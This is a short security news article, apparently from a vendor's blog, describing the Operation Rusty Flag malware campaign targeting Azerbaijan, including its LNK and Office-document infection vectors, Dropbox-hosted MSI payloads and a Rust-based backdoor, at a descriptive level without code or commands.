HQ/EMEAFind out how we can help your business
Azerbaijan has become the target of a newly discovered sophisticated malware campaign, Operation Rusty Flag, to compromise targeted systems. This rust-based malware campaign has yet to show evidence of affiliation with any known threat actor or group, making it a mysterious and potentially dangerous threat.
Moreover, it employs at least two distinct initial access methods. One of these methods involves a modified document previously used by the Storm-0978 group, which could be a strategy of its operators to mislead investigators into thinking that Storm-0978 operates the campaign.
The attack method starts with an LNK file named “1.KARABAKH.jpg.lnk,” a loader retrieving a second-stage payload—an MSI installer stored on Dropbox. This installer drops a Rust-based implant, an XML file for a scheduled task to run the implant, and a decoy image displaying watermarks from the Azerbaijan Ministry of Defense symbol.
The Operation Rusty Flag operators also have another infection tactic.
The Operation Rusty Flag operators also leverage an infection vector that uses a Microsoft Office document named “Overview_of_UWCs_UkraineInNATO_campaign.docx.” This method exploits a six-year-old memory corruption flaw in Microsoft Office’s Equation Editor. Additionally, this vulnerability triggers a Dropbox URL housing a different MSI file that serves a variant of the Rust-based backdoor.
The malware operators’ use of the “Overview_of_UWCs_UkraineInNATO_campaign.docx” document implies that they are the same actors named Storm-0978, who previously used the same malware in cyberattacks against Ukraine. This strategy exploits a different Office remote code execution bug (CVE-2023-36884). However, these actors may have also deliberately used Storm-0978 to blame them.
The Rust-based backdoor and the one disguised as “WinDefenderHealth.exe” could gather data from the infected host and exfiltrate it to an attacker-controlled server. Unfortunately, the campaign’s primary objective remains a mystery despite the ongoing investigation.
There is a concerning trend about the increasing number of malware authors that employ the Rust programming language to bypass security products. These new adaptations pose challenges for accurate detection and threat analysis, making the threat landscape even more sophisticated and hostile. In conclusion, Operation Rusty Flag is one of the new evolving sophisticated cyber threats that employ the Rust-based module.
